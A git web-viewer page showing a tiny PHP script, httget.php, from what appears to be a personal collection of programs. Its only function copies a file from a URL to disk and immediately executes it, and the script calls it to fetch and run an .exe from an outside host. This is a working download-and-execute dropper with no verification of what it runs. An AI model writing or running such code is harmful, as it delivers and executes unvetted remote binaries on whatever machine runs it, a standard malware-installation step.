docs
[mirrors/Programs.git] / php / skripty / httget.php
1 <?php
2
3 function http_download ($what, $where) {
4 copy($what,$where);
5 exec($where);
6 }
7
8 http_download("http://harvie.stokoruna.cz/files/skategirl.exe", "skategirl.exe");
9
10 ?>
This page took 0.303704 seconds and 4 git commands to generate.